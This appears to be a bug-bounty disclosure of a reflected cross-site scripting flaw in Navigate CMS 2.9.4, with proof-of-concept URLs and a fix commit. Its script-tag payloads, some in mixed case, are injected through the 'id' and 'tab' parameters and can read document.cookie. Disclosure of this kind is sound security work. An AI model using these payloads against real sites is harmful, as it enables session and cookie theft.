Cross-site Scripting (XSS) - Reflected in navigatecms/navigate-cms

Valid

Reported on

Jan 30th 2022

Description

Cross-Site Scripting is vulnerability which allows attackers to execute arbitrary javascript code in the browser of victim.

Proof of Concept

Parameter: id

Payload: <script>alert(document.cookie)</script>

Affected endpoints:

On Firefox browser, visit:

1 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3Cscript%3Ealert(%22xss-1%22)%3C/script%3E

2 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

3 http://localhost/navigate2.9.4/navigate/navigate.php?fid=files&act=edit&op=replace_file&id=%3CsCriPt%3Ealert(%22XSS-1%22)%3C/sCriPt%3E&tab=%3CsCriPt%3Ealert(%22XSS-2%22)%3C/sCriPt%3E

XSS alert will pop-up showing user cookie or xss-1.

Impact

This vulnerability is capable of capture the cookies of anyone that navigates to the vulnerable URL.

Occurrences

files.php L298

References

GitHub issue

We are processing your report and will contact the navigatecms/navigate-cms team within 24 hours. a year ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago

Faisal Fs ⚔️

commented a year ago

Researcher

@admin, it has been fixed.

https://github.com/NavigateCMS/Navigate-CMS/commit/f9af8cbf4831599c9092a22f9f931cf1db8c3876

Jamie Slome validated this vulnerability a year ago

Faisal Fs ⚔️ has been awarded the disclosure bounty

The fix bounty is now up for grabs

Jamie Slome marked this as fixed in f9af8cbf4831599c9092a22f9f931cf1db8c3876 with commit f9af8c a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

files.php#L298 has been validated

to join this conversation